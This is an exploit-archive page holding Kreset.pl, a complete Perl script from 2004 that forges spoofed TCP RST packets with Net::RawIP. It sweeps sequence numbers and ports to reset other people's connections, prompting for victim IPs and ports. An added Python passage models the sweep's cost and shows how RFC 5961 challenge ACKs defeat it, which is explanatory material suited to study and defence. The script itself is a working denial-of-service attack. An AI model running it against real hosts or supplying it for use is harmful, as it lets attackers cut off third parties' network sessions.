TCP Window Size RST
Source: xzziroz.freeshell.org  Author: K-sPecial  Published: 2004-04-28

#!/usr/bin/perl

use Net::RawIP;
## Kreator -> K-sPecial [http://xzziroz.freeshell.org]
## Date -> 4-23-2004
## Name -> Kreset.pl
## Version -> 1.0
##
## Use -> Used to reset a TCP connection.
## (Using the "slipping through the window" method described on 4-20-04)
## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm
##
## Usage -> If you don't fuckin know how to use it, don't use it.
##
## Other -> I played around on nix for a few hours to get the idea down
## pat. I set up an IRCD and connected to it, looked at tcpdump to
## get irssi's local port. irssi's window size was larger, so I figured
## I would pretend to be sending RST from the server; irssi's window
## was around 30K while ircd's window was around 3K, big difference :D.
## So I entered the values, and since the connection is loopback, I used
## 0.0 seconds between packets. It only took a few minutes to disconnect
## with a 0.0 delay and a 30K window starting at sequence number 0. The
## only problem over the internet is finding the port of each side; sure,
## you know the server's port but not the client's. I got to sequence
## number 1512500 using a .10 second delay and a window size of 2500.
## Sequence numbers are 32-bit numbers; 32 1's comes out to 4294967295.
## Do the math, and you know precisely how long it takes to cover
## every sequence RANGE of a given port using a given window size.
## Window sizes should be based on the application layer program.
##
## NOTE -> This script assumes you know at least one of the ports; if
## the case is otherwise, then the script can easily be modified to work
## around this. Also, this was written for UNIX variants.

print <<EOF;
-> Kreset.pl by K-sPecial [4-23-2004]
-> Used to reset a connection based on the slipping
-> through the window method, exploited publicly on 4-20-2004.
-> [http://xzziroz.freeshell.org]
-> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey
-> eightball, unmanarc, Buuyo^, and whomever else I forgot.
EOF

## One side's port is known and stays fixed; the other side's port is
## swept over a range (the full 32-bit sequence space is walked for
## each port in that range).
print "\r\nWhich side's port should be swept over a range?";
print "\r\nType 1 to sweep the source port (dest port fixed),";
print "\r\nor 2 to sweep the dest port (source port fixed): ";
chomp (my $choice = <STDIN>);
unless ($choice == 1 || $choice == 2) {
print "\r\nEnter 1, or 2.\r\n";
exit(1);
}
## Source = the peer whose RST we forge (the spoofed address).
## Dest   = the victim host that will tear the connection down.
print "\r\nEnter source IP: ";
chomp (my $sip = <STDIN>);
if ($choice == 2) {
print "\r\nEnter source port: ";
chomp ($sport = <STDIN>);
if (!($sport)) {
print "\r\nYou must fill in a source port.\r\n";
exit(1);
}
}
print "\r\nEnter dest IP: ";
chomp (my $dip = <STDIN>);
if ($choice == 1) {
print "\r\nEnter dest port: ";
chomp ($dport = <STDIN>);
if (!($dport)) {
print "\r\nYou must fill in a destination port.\r\n";
exit(1);
}
}
print "\r\nEnter begin port: ";
chomp (my $bport = <STDIN>);
print "\r\nEnter end port: ";
chomp (my $eport = <STDIN>);
if (!($sip) || !($dip) || !($bport) || !($eport)) {
print "\r\nYou forgot to fill in one or more fields.\r\n";
exit(1); ## Yea hahah we don't exit (0) anymore. LOL
}
print "\r\nDestinations guessed window size,";
print "\r\nIf you don't define this, we will try small (2500): ";
chomp (my $winsize = <STDIN>); ## Why did the window cross the road
if (!($winsize)) {
$winsize = 2500;
}
print "\r\nStarting sequence number,";
print "\r\nIf you don't define this, we will start at 0: ";
chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers
if (!($seqnum)) { ## from getting through!
$seqnum = 0;
}

print "\r\nNumber of seconds to wait between each packet sent";
print "\r\n(fractions allowed: 0.10 == 100 ms, 0.0 == no delay).";
print "\r\nIf you don't define this, we will use 0.10: ";
chomp (my $ms = <STDIN>);
if ($ms eq "") { ## test for empty, so an explicit 0 really means no delay
$ms = "0.10";
}

print <<EOF;

Source IP is -> $sip
Destination IP is -> $dip
Guessed window size is -> $winsize
Starting sequence number is -> $seqnum
Loop wait is -> $ms
Begin port is -> $bport
End port is -> $eport
EOF
print "Destination port is -> $dport\r\n" if $dport;
print "Source port is -> $sport\r\n" if $sport;
print "\r\n";

my $i = $seqnum;
## Walk the 32-bit sequence space in window-sized steps: one spoofed RST
## per slot, so that some RST lands inside the victim's receive window
## wherever that window currently sits (provided $winsize is not larger
## than the real window, or slots get skipped). Once the space is
## exhausted, move to the next port in the range and start over at
## $seqnum. The four-argument select() is the sub-second sleep; it is
## what ties this script to UNIX variants.
my $pkt = new Net::RawIP;
while (1) {
if ($i > 4294967295) {
$bport++;
if ($bport > $eport) {
print "Finished\r\n";
exit(0);
}
print "Looping next port.\r\n";
$i = $seqnum;
sleep(2);
next; ## restart at $seqnum without skipping the new port's first slot
}
if ($choice == 2) {
$dport = $bport;
}
else {
$sport = $bport;
}

select(undef, undef, undef, $ms);
print "Sequence Number is -> $i port is -> $bport\r\n";

## Spoofed RST (the author also sets SYN). A pre-RFC 5961 stack honours
## the RST as soon as seq falls anywhere inside its receive window.
$pkt->set({ip => {saddr => "$sip", daddr => "$dip"},
tcp => {source => $sport, dest => $dport, rst => 1,
syn => 1, seq => $i}});
$pkt->send;

$i += $winsize;
}
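The arithmetic in the header comments (2^32 sequence numbers, one RST per window-sized slot, delay times packets times candidate ports) and the effect of the "guessed window size" prompt, worked through as an added example. This is not part of Kreset.pl or K-sPecial's work; it is Python rather than Perl so the numbers can be checked offline, and the victim's window position and sizes are constructed values. It also goes one step beyond the page by putting the receiver rule the attack relies on (any in-window RST is honoured) beside the RFC 5961 rule that later closed it (only an exact rcv.nxt match resets; an in-window mismatch earns a challenge ACK), so the same sweep can be replayed against both.

```python
# Added example (not part of Kreset.pl): models the sequence-space sweep the
# script performs and the receiver-side rule that decides whether a spoofed
# RST is honoured. Every number below (windows, the victim's real rcv.nxt)
# is constructed for illustration.

SEQ_SPACE = 2 ** 32          # TCP sequence numbers are 32-bit


def packets_per_port(window):
    """Spoofed RSTs needed to put one packet in every window-sized slot of
    a single port (same bound as the script: stop once seq > 2^32 - 1)."""
    return -(-SEQ_SPACE // window)          # ceiling division


def sweep_seconds(window, delay, ports=1):
    """Wall-clock cost of covering `ports` candidate ports at `delay`
    seconds per packet: the "do the math" from the script's header."""
    return packets_per_port(window) * delay * ports


def in_window(seq, rcv_nxt, rcv_wnd):
    """rcv_nxt <= seq < rcv_nxt + rcv_wnd, safe across 2^32 wrap-around."""
    return (seq - rcv_nxt) % SEQ_SPACE < rcv_wnd


def rst_verdict_rfc793(seq, rcv_nxt, rcv_wnd):
    """Pre-RFC 5961 receiver: any in-window RST tears the connection down."""
    return "reset" if in_window(seq, rcv_nxt, rcv_wnd) else "dropped"


def rst_verdict_rfc5961(seq, rcv_nxt, rcv_wnd):
    """RFC 5961 section 3.2: only an exact rcv_nxt match resets; an
    in-window mismatch gets a challenge ACK (a real peer would answer it
    with a correctly numbered RST); anything else is dropped."""
    if seq == rcv_nxt:
        return "reset"
    if in_window(seq, rcv_nxt, rcv_wnd):
        return "challenge-ack"
    return "dropped"


def sweep(guess_window, start, rcv_nxt, rcv_wnd, verdict):
    """Replay the script's loop for one port against a simulated victim
    whose window sits at rcv_nxt with size rcv_wnd.
    Returns (packets_sent, outcome)."""
    seq, sent = start, 0
    while seq <= SEQ_SPACE - 1:            # the script's 4294967295 bound
        sent += 1
        if verdict(seq, rcv_nxt, rcv_wnd) == "reset":
            return sent, "reset"
        seq += guess_window
    return sent, "survived"


if __name__ == "__main__":
    victim_nxt, victim_wnd = 1_234_567_890, 2500      # constructed values
    print("packets per port at window 2500:", packets_per_port(2500))
    print("hours for one port at 0.10 s/packet:",
          sweep_seconds(2500, 0.10) / 3600)
    for label, verdict in (("RFC 793 ", rst_verdict_rfc793),
                           ("RFC 5961", rst_verdict_rfc5961)):
        print(label, "guess == real window:",
              sweep(2500, 0, victim_nxt, victim_wnd, verdict))
        print(label, "guess 30000 > real 2500:",
              sweep(30000, 0, victim_nxt, victim_wnd, verdict))
```

Two things the run makes visible that the header only hints at: over-guessing the window (30000 against a real 2500) leaves gaps, and the sweep walks the whole space without ever landing in-window; and under RFC 5961 even a correctly sized sweep does not reset, because a step of `window` hits `rcv_nxt` exactly only by coincidence, and every near miss is answered with a challenge ACK instead.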



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Web JetAdmin 6.5 Remote Roo
·IIS 5 SSL remote root exploit
·kernel 2.x MCAST_MSFILTER Proo
·eXtremail 1.5.x Denial of Serv
·Microsoft Win Utility Manager
·SquirrelMail Change_Passwd插件
·MS04011.cpp
·Siemens S55 Unauthorized SMS S
·Win Lsasrv.dll RPC buffer over
·TCP vulnerability proof of con
·Microsoft IIS 5.x SSL PCT Remo
·Windows Lsasrv.dll Remote Univ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved